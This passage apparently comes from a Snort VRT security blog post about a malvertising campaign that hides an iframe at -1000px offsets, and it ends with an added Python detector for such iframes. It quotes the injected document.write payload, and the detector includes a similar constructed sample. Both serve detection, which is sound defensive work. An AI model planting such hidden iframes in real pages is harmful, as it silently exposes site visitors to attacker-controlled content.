The VRT has observed a recent malvertising campaign in the wild that puts a new spin on this old idea. Instead of specifying size values so small that the iframe never renders, the technique used here abuses the CSS positioning attributes by specifying absolute values of -1,000 for both the "left" and "top" parameters. As the iframe is declared to be 6x10 pixels in size, the browser considers it to be so far off the edge of the screen that it never even attempts to render it for the user:
document.write('<iframe height="10" src="http://<redacted>.org/route.htm" style="left: -1000px; position: absolute; top: -1000px; z-index: 1;" width="6"></iframe>');
Fortunately, this particular variant makes for an easy signature, as no legitimate iframes will ever be placed in such a ludicrous spot on the page; SID 23618 will do the job nicely. In the meantime, the VRT is continuing to follow new developments in iframe obfuscation, with an eye towards generically detecting malicious hidden iframes. As always, if you see something malicious on your network that we're not currently providing coverage for, please send us a sample at vrt at sourcefire dot com, so that our detection can be improved for you and for the entire Snort user base.
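The same placement check can be run over captured page source. The following is an added example, not the logic of SID 23618 or any VRT code: it flags iframes that are absolutely positioned far off-screen, both in plain markup and inside document.write() string literals. The -500px threshold, the function names and the sample hostnames are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

OFFSCREEN_PX = -500  # assumed threshold, not taken from SID 23618
DOC_WRITE = re.compile(r"document\.write\(\s*(['\"])(.*?)\1\s*\)", re.S)
# Constructed samples; hostnames are placeholders.
HIDDEN = ("<script>document.write('<iframe height=\"10\" "
          "src=\"http://ads.example.invalid/route.htm\" style=\"left: -1000px; "
          "position: absolute; top: -1000px; z-index: 1;\" width=\"6\"></iframe>');"
          "</script>")
VISIBLE = ('<iframe src="https://video.example.invalid/embed" width="560" '
           'height="315" style="position: absolute; left: 0; top: 20px"></iframe>')

def parse_style(style):
    """Split an inline style attribute into a {property: value} dict."""
    props = {}
    for decl in style.split(";"):
        name, sep, value = decl.partition(":")
        if sep:
            props[name.strip().lower()] = value.strip().lower()
    return props

def px(value):
    """Return a plain pixel offset as a float, or None for anything else."""
    m = re.fullmatch(r"(-?\d+(?:\.\d+)?)(?:px)?", value or "")
    return float(m.group(1)) if m else None

class OffscreenIframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []
    def handle_starttag(self, tag, attrs):
        style = parse_style(dict(attrs).get("style") or "")
        if tag != "iframe" or style.get("position") not in ("absolute", "fixed"):
            return
        offsets = (px(style.get("left")), px(style.get("top")))
        if any(o is not None and o <= OFFSCREEN_PX for o in offsets):
            self.hits.append(dict(attrs).get("src"))

def find_offscreen_iframes(page):
    """Check the markup itself plus every document.write() string literal."""
    fragments = [page] + [m.group(2).replace('\\"', '"') for m in DOC_WRITE.finditer(page)]
    hits = []
    for fragment in fragments:
        finder = OffscreenIframeFinder()
        finder.feed(fragment)
        finder.close()
        hits += [src for src in finder.hits if src not in hits]
    return hits
```

Only inline style attributes and literal document.write() strings are inspected, so positioning applied through a stylesheet or markup assembled at runtime is outside what this check sees.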